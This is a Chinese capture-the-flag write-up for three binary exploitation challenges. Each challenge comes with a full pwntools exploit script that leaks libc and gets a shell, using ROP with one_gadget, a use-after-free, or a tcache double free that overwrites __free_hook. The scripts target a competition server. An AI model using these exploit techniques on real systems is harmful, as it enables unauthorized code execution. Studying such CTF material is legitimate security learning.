三道PWN,感觉还好。

echo server

挺基础的泄露+利用,我用的one_gedget来梭哈的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# -*- coding: utf-8 -*
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
p = 0
def pwn(ip,port,debug,flaag):
elf = ELF(flaag)
global p
if(debug == 1):
p = process(flaag)

else:
p = remote(ip,port)
#gdb.attach(p)
p.sendlineafter("is your name: ","256")
pop_rdi_ret=0x400823
pop_rsi_ret=0x400821
payload="A"*128+p64(0x7fffffffff)+p64(pop_rdi_ret)+p64(0x400875)
payload+=p64(pop_rsi_ret)+p64(elf.got["__libc_start_main"])+p64(0)
payload+=p64(elf.plt["printf"])+p64(0x4007a5)
p.sendlineafter("s you name? ",payload)
p.recvuntil("hello ")
p.recvuntil("hello ")
libc_addr=u64(p.recv(6).ljust(8,"\x00"))
print "libc_addr=",hex(libc_addr)
#libc_addr=u64(p.recvuntil("how long",True)[-6:].ljust(8,"\x00"))
libc=ELF("libc.so.6")
libcbase_addr=libc_addr-libc.symbols["__libc_start_main"]
system_addr=libcbase_addr+libc.symbols["system"]
binsh_addr=libcbase_addr+libc.search("/bin/sh\x00").next()
one_ge=[0x4f2c5,0x4f322,0x10a38c]
p.sendlineafter("is your name: ","256")
payload="A"*136+p64(libcbase_addr+one_ge[0])#p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
p.sendlineafter("s you name? ",payload)
p.interactive()
if __name__ == '__main__':
pwn('183.129.189.60',10025,0,'./test')

sales_office

UAF漏洞,远程还是2.27,可以秒。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('sales_office')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./sales_office')

else:
p = remote(ip,port)
def add(strlen,content):
p.sendlineafter("choice:","1")
p.sendlineafter("size of your house:\n",str(strlen))
p.sendlineafter("decorate your house:\n",content)
def show(index):
p.sendlineafter("choice:","3")
p.sendlineafter("index:",str(index))
def free(index):
p.sendlineafter("choice:","4")
p.sendlineafter("index:",str(index))
add(0x10,"/bin/sh")
p.sendlineafter("choice:","1")
p.sendlineafter("size of your house:\n","200")
free(0)
free(0)
free(1)
add(0x10,p64(0x602080))
p.sendlineafter("choice:","1")
p.sendlineafter("size of your house:\n","200")
p.sendlineafter("choice:","1")
p.sendlineafter("size of your house:\n","200")
show(2)
p.recvuntil("house:\n")
libc_addr=u64(p.recv(6).ljust(8,"\x00"))
free_hook=libc_addr+0x1188
system_addr=free_hook-0x39e4a8
free(1)
free(1)
p.sendlineafter("choice:","1")
p.sendlineafter("size of your house:\n","200")
free(1)
print "libc_addr=",hex(libc_addr)
add(0x10,p64(free_hook))
add(0x10,p64(system_addr))
add(0x10,"/bin/sh")
free(4)
#gdb.attach(p)
p.interactive()
if __name__ == '__main__':
pwn('183.129.189.60',10024,0)

sales_office_2

跟第二题一模一样,不过远程是2.29,double free可能有点麻烦,经师傅提示用house of spirit来伪造chunk,不过我还是用的double free.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('sales_office')
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./sales_office')

else:
p = remote(ip,port)
def add(strlen,content):
p.sendlineafter("choice:","1")
p.sendlineafter("size of your house:\n",str(strlen))
p.sendlineafter("decorate your house:\n",content)
def NULLadd():
p.sendlineafter("choice:","1")
p.sendlineafter("size of your house:\n","300")
def show(index):
p.sendlineafter("choice:","3")
p.sendlineafter("index:",str(index))
def free(index):
p.sendlineafter("choice:","4")
p.sendlineafter("index:",str(index))
for i in range(5):
add(0x20,"/bin/sh")
add(0x20,"/bin/sh") #----5
NULLadd()
free(5)
free(6)
add(0x10,p64(0x602080))
show(5)
p.recvuntil("house:\n")
libc_addr=u64(p.recv(6).ljust(8,"\x00"))
free_hook=libc_addr+0x1e48
system_addr=free_hook-0x1945d8

add(0x20,"/bin/sh")#-----7
add(0x20,"/bin/sh")
NULLadd()
free(6)
free(4)
free(3)
free(2)
free(1)
free(0)

free(7)
free(8)
free(7)
free(9)
for i in range(7):
NULLadd()
NULLadd()
add(0x10,p64(free_hook))
print "libc_addr=",hex(libc_addr)
print "free_hook=",hex(free_hook)
NULLadd()
add(0x10,p64(system_addr))
add(0x10,"/bin/sh")
free(11)
p.interactive()
if __name__ == '__main__':
pwn('183.129.189.60',10025,1)

总结

以后学会了有UAF,并且chunk内有指针优先用house of spirit,简直通杀我靠。自己也是用double free习惯了。西八。